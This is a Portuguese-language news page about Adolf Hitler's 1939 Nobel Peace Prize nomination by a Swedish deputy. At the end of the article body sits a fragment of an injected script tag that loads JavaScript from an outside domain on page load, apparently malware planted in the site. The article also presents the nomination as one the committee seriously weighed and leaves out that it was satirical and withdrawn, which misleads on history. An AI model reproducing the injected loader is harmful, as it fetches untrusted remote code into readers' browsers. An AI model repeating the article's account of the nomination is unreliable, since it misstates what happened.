InícioVariedadesHitler e o prêmio Nobel da Paz

Hitler e o prêmio Nobel da Paz

Últimas notícias

Guerra Mundial: entenda riscos de conflito entre Israel e Irã

O risco de uma nova guerra mundial existe caso...

Parada 120 – Hamburgueria artesanal em Três Barras

Conheça o melhor delivery de hambúrgueres artesanais de Três...

Senado aprova isenção de IR para quem ganha até dois salários mínimos

O Senado aprovou nesta quarta-feira (17) o projeto de...

Quem poderia imaginar que o responsável pelo holocausto, causador da morte de milhões de pessoas durante o regime nazista da Alemanha, teria sido indicado ao Prêmio Nobel da Paz? A Informação é no mínimo, intrigante, mas também é verdadeira. Adolf Hitler foi indicado ao Prêmio Nobel da Paz em 1939.

 

Segundo o jornal espanhol “ABC”, que publicou um artigo de Carmen Villar, Hitler teria sido indicado ao prêmio pelo deputado sueco E.G.C Brandt.  Após a indicação, o comitê do prêmio chegou a cogitar a possibilidade de aceitar que Hitler recebesse a premiação. Entretanto, a indicação teria que passar também pelo crivo do instituto Nansen, uma organização dedicada a investigações diversas.

 

De acordo com o jornal, Hitler acabou não recebendo votos suficientes, e sua nomeação foi cancelada. Na época, a indicação gerou muita polemica e discussão entre os membros do comitê do premio Nobel. Algumas pessoas defendiam que Hitler merecia o Nobel da Paz devido às “conversações que manteve com o governo britânico sobre a paz na Europa”.

 

O caso acabou arquivado e escondido a sete chaves por vários anos. Havia quem defendesse a idéia de que Hitler deveria ser agraciado, postumamente, com o Prêmio Nobel da Paz, afirmando que o nazista não tinha sido culpado pela Segunda Guerra Mundial e alegando que ele havia trabalhado pela paz em todos os sentidos.

 

Por sorte, o bom senso prevaleceu e Hitler entrou o seu papel na historia da humanidade:

O de assassino cruel, sádico e ditador…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe Gazeta
Equipe Gazetahttps://gazetanortesc.com.br
Somos um jornal de notícias e classificados gratuitos. Estamos há 25 anos no mercado e nosso principal diferencial é o jornal digital.